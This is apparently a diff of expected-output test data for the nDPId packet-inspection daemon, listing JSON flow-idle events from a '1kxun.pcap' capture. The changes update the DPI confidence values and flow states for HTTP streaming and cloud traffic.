-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1654385140836,"flow_last_seen":1654385145144,"flow_idle_time":7580000,"flow_min_l4_payload_len":436,"flow_max_l4_payload_len":1654,"flow_tot_l4_payload_len":7737,"flow_avg_l4_payload_len":1105,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45422,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
-00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385140850,"flow_last_seen":1654385141035,"flow_idle_time":7580000,"flow_min_l4_payload_len":414,"flow_max_l4_payload_len":1721,"flow_tot_l4_payload_len":2135,"flow_avg_l4_payload_len":1067,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45424,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1654385140779,"flow_last_seen":1654385145113,"flow_idle_time":7580000,"flow_min_l4_payload_len":443,"flow_max_l4_payload_len":8192,"flow_tot_l4_payload_len":19639,"flow_avg_l4_payload_len":1963,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45388,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1654385140794,"flow_last_seen":1654385145146,"flow_idle_time":7580000,"flow_min_l4_payload_len":424,"flow_max_l4_payload_len":7200,"flow_tot_l4_payload_len":59466,"flow_avg_l4_payload_len":2831,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45398,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1654385156800,"flow_last_seen":1654385156865,"flow_idle_time":7580000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":2836,"flow_tot_l4_payload_len":29208,"flow_avg_l4_payload_len":1718,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.217.18.98","src_port":44368,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.GoogleServices","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1654385184117,"flow_last_seen":1654385184139,"flow_idle_time":7580000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":796,"flow_tot_l4_payload_len":1136,"flow_avg_l4_payload_len":378,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"8.209.97.107","src_port":56826,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1654385140824,"flow_last_seen":1654385145140,"flow_idle_time":7580000,"flow_min_l4_payload_len":416,"flow_max_l4_payload_len":1390,"flow_tot_l4_payload_len":5240,"flow_avg_l4_payload_len":873,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1654385140835,"flow_last_seen":1654385157149,"flow_idle_time":7580000,"flow_min_l4_payload_len":434,"flow_max_l4_payload_len":14400,"flow_tot_l4_payload_len":88367,"flow_avg_l4_payload_len":2761,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1654385140836,"flow_last_seen":1654385145144,"flow_idle_time":7580000,"flow_min_l4_payload_len":436,"flow_max_l4_payload_len":1654,"flow_tot_l4_payload_len":7737,"flow_avg_l4_payload_len":1105,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45422,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385140850,"flow_last_seen":1654385141035,"flow_idle_time":7580000,"flow_min_l4_payload_len":414,"flow_max_l4_payload_len":1721,"flow_tot_l4_payload_len":2135,"flow_avg_l4_payload_len":1067,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45424,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385142293,"flow_last_seen":1654385142293,"flow_idle_time":7580000,"flow_min_l4_payload_len":517,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":517,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"119.28.164.143","src_port":51888,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385229450,"flow_last_seen":1654385229557,"flow_idle_time":7580000,"flow_min_l4_payload_len":75,"flow_max_l4_payload_len":424,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.233.123.55","src_port":54810,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1654385184938,"flow_last_seen":1654385185019,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":5712,"flow_tot_l4_payload_len":97422,"flow_avg_l4_payload_len":3247,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36636,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":94,"flow_first_seen":1654385184944,"flow_last_seen":1654385185098,"flow_idle_time":7580000,"flow_min_l4_payload_len":497,"flow_max_l4_payload_len":8568,"flow_tot_l4_payload_len":367244,"flow_avg_l4_payload_len":3906,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36640,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1654385184944,"flow_last_seen":1654385185046,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":4284,"flow_tot_l4_payload_len":89447,"flow_avg_l4_payload_len":3440,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36654,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385229450,"flow_last_seen":1654385229557,"flow_idle_time":7580000,"flow_min_l4_payload_len":75,"flow_max_l4_payload_len":424,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.233.123.55","src_port":54810,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1654385184938,"flow_last_seen":1654385185019,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":5712,"flow_tot_l4_payload_len":97422,"flow_avg_l4_payload_len":3247,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36636,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":94,"flow_first_seen":1654385184944,"flow_last_seen":1654385185098,"flow_idle_time":7580000,"flow_min_l4_payload_len":497,"flow_max_l4_payload_len":8568,"flow_tot_l4_payload_len":367244,"flow_avg_l4_payload_len":3906,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36640,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1654385184944,"flow_last_seen":1654385185046,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":4284,"flow_tot_l4_payload_len":89447,"flow_avg_l4_payload_len":3440,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36654,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1654385184982,"flow_last_seen":1654385185015,"flow_idle_time":7580000,"flow_min_l4_payload_len":251,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":4797,"flow_avg_l4_payload_len":1199,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36660,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385184845,"flow_last_seen":1654385185166,"flow_idle_time":7580000,"flow_min_l4_payload_len":170,"flow_max_l4_payload_len":1044,"flow_tot_l4_payload_len":1214,"flow_avg_l4_payload_len":607,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"202.153.196.53","src_port":58758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385184857,"flow_last_seen":1654385185942,"flow_idle_time":7580000,"flow_min_l4_payload_len":170,"flow_max_l4_payload_len":1044,"flow_tot_l4_payload_len":1214,"flow_avg_l4_payload_len":607,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"202.153.196.53","src_port":58760,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1654385176794,"flow_last_seen":1654385178653,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":19289,"flow_tot_l4_payload_len":216361,"flow_avg_l4_payload_len":6363,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1654385176795,"flow_last_seen":1654385178226,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":24480,"flow_tot_l4_payload_len":116983,"flow_avg_l4_payload_len":4874,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38316,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1654385176794,"flow_last_seen":1654385178039,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":12423,"flow_tot_l4_payload_len":87831,"flow_avg_l4_payload_len":3992,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38326,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385229460,"flow_last_seen":1654385229568,"flow_idle_time":7580000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":694,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":432,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.235.204.9","src_port":40204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1654385142780,"flow_last_seen":1654385142861,"flow_idle_time":7580000,"flow_min_l4_payload_len":520,"flow_max_l4_payload_len":2836,"flow_tot_l4_payload_len":28083,"flow_avg_l4_payload_len":2160,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"142.250.186.34","src_port":38354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1654385145219,"flow_last_seen":1654385147933,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":21600,"flow_tot_l4_payload_len":248006,"flow_avg_l4_payload_len":4350,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1654385146263,"flow_last_seen":1654385158374,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":15840,"flow_tot_l4_payload_len":195184,"flow_avg_l4_payload_len":3753,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49370,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1654385146253,"flow_last_seen":1654385148239,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":18720,"flow_tot_l4_payload_len":144162,"flow_avg_l4_payload_len":4004,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49372,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1654385146276,"flow_last_seen":1654385147585,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":18720,"flow_tot_l4_payload_len":98936,"flow_avg_l4_payload_len":3091,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49380,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1654385146284,"flow_last_seen":1654385147935,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":21600,"flow_tot_l4_payload_len":133307,"flow_avg_l4_payload_len":4300,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49396,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1654385134408,"flow_last_seen":1654385136566,"flow_idle_time":7580000,"flow_min_l4_payload_len":225,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":1447,"flow_avg_l4_payload_len":361,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.119.80","src_port":49242,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1654385146276,"flow_last_seen":1654385147926,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":21600,"flow_tot_l4_payload_len":128312,"flow_avg_l4_payload_len":4935,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49412,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385184845,"flow_last_seen":1654385185166,"flow_idle_time":7580000,"flow_min_l4_payload_len":170,"flow_max_l4_payload_len":1044,"flow_tot_l4_payload_len":1214,"flow_avg_l4_payload_len":607,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"202.153.196.53","src_port":58758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385184857,"flow_last_seen":1654385185942,"flow_idle_time":7580000,"flow_min_l4_payload_len":170,"flow_max_l4_payload_len":1044,"flow_tot_l4_payload_len":1214,"flow_avg_l4_payload_len":607,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"202.153.196.53","src_port":58760,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1654385176794,"flow_last_seen":1654385178653,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":19289,"flow_tot_l4_payload_len":216361,"flow_avg_l4_payload_len":6363,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1654385176795,"flow_last_seen":1654385178226,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":24480,"flow_tot_l4_payload_len":116983,"flow_avg_l4_payload_len":4874,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38316,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1654385176794,"flow_last_seen":1654385178039,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":12423,"flow_tot_l4_payload_len":87831,"flow_avg_l4_payload_len":3992,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38326,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385229460,"flow_last_seen":1654385229568,"flow_idle_time":7580000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":694,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":432,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.235.204.9","src_port":40204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
